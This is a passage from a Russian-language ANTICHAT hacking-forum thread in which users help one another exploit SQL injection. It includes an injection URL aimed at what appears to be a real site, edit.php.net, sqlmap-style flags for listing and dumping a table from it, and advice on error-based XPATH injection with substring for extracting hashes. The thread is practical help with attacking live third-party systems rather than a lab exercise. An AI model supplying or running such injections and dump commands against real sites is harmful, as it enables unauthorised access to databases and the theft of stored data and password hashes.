ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2521  
Старый 04.02.2019, 18:57
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от giloo  
↑
Теперь знаю) я же говорила что недавно в данном направлении
Лучше бы имя своё сказала бы
 
Ответить с цитированием

  #2522  
Старый 05.02.2019, 15:54
giloo
Новичок
Регистрация: 02.02.2019
Сообщений: 28
С нами: 3831446

Репутация: 4
По умолчанию

Получилось вставить после значения команду PROCEDURE ANALYSE() и запрос прошел. В результате вернуло ~40 строк без полезной информации(
 
Ответить с цитированием

  #2523  
Старый 05.02.2019, 18:03
check
Новичок
Регистрация: 09.12.2018
Сообщений: 2
С нами: 3910646

Репутация: 0
По умолчанию

edit.php.net/do/getUsageInfos?year=2015 and 1=1%23&csrfToken=[после входа]

-D doc_editor -T checkEntities

смотрю как вывод получить? четыре калонки
 
Ответить с цитированием

  #2524  
Старый 05.02.2019, 18:09
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от check  
↑
edit.php.net/do/getUsageInfos?year=2015 and 1=1%23&csrfToken=[после входа]
-D doc_editor -T checkEntities
смотрю как вывод получить? четыре калонки
-D doc_editor -T checkEntities --column

-D doc_editor -T checkEntities -C имя интересующий колонки --dump
 
Ответить с цитированием

  #2525  
Старый 05.02.2019, 18:11
check
Новичок
Регистрация: 09.12.2018
Сообщений: 2
С нами: 3910646

Репутация: 0
По умолчанию

почему unionbased не подключает?
 
Ответить с цитированием

  #2526  
Старый 05.02.2019, 18:14
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от check  
↑
почему unionbased не подключает?
Я не экстрасенс, надо видеть полную картину
 
Ответить с цитированием

  #2527  
Старый 11.02.2019, 10:05
giloo
Новичок
Регистрация: 02.02.2019
Сообщений: 28
С нами: 3831446

Репутация: 4
По умолчанию

Всем привет!

Есть запрос:

Код:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 [ЗДЕСЬ ИНЪЕКЦИЯ]
(Error based SQLI)

Подскажите как раскрутить)

procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(

То есть даже не дает 1+1 внутри выполнить

Пробовала еще SELECT id,name FROM cities ORDER BY id LIMIT 0,5 INTO OUTFILE(version())

Вывело:

Код:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(version())' at line 1
Значит INTO OUTFILEприняло? Есть еще функции по типу outfile для вставки после INTO? Или я вообще не то делаю?)
 
Ответить с цитированием

  #2528  
Старый 11.02.2019, 12:32
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от giloo  
↑
Всем привет!
Есть запрос:
Код:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 [ЗДЕСЬ ИНЪЕКЦИЯ]
(Error based SQLI)
Подскажите как раскрутить)
procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(
То есть даже не дает 1+1 внутри выполнить
Пробовала еще SELECT id,name FROM cities ORDER BY id LIMIT 0,5
INTO OUTFILE(version())
Вывело:
Код:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(version())' at line 1
Значит
INTO OUTFILE
приняло? Есть еще функции по типу outfile для вставки после INTO? Или я вообще не то делаю?)
Что ты .делаешь?
 
Ответить с цитированием

  #2529  
Старый 11.02.2019, 16:35
crlf
Постоянный
Регистрация: 18.03.2016
Сообщений: 685
С нами: 5344886

Репутация: 441


По умолчанию

Цитата:
Сообщение от giloo  
↑
Значит
INTO OUTFILE
приняло?
В ошибке явно указано, что нарушен синтаксис. Лучше один раз увидеть, то бишь установить локально MySQL и разобраться в синтаксисе. Или, как минимум, почитать гайды по SQL инъекциям для новичков.
 
Ответить с цитированием

  #2530  
Старый 11.02.2019, 17:27
karkajoi
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами: 5025206

Репутация: 5
По умолчанию

Цитата:
Сообщение от giloo  
↑
Всем привет!
Есть запрос:
Код:
SELECT id,name FROM cities ORDER BY id LIMIT 0,5 [ЗДЕСЬ ИНЪЕКЦИЯ]
(Error based SQLI)
Подскажите как раскрутить)
procedure analyse(1,1) помогает, но не позволяет вызывать функции в параметрах(
То есть даже не дает 1+1 внутри выполнить
Пробовала еще SELECT id,name FROM cities ORDER BY id LIMIT 0,5
INTO OUTFILE(version())
Вывело:
Код:
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '(version())' at line 1
Значит
INTO OUTFILE
приняло? Есть еще функции по типу outfile для вставки после INTO? Или я вообще не то делаю?)
http://www.securityidiots.com/Web-P...XPATH-Error-Based-Injection-Extractvalue.html изучаем, пробуем.

Сразу надо оговорится, что длина вывода не будет превышать 32 символа вроде. Что б вывести все что 32+ символы(хэш например) надо воспользоватся функцией substring(hash,32)
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема

Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.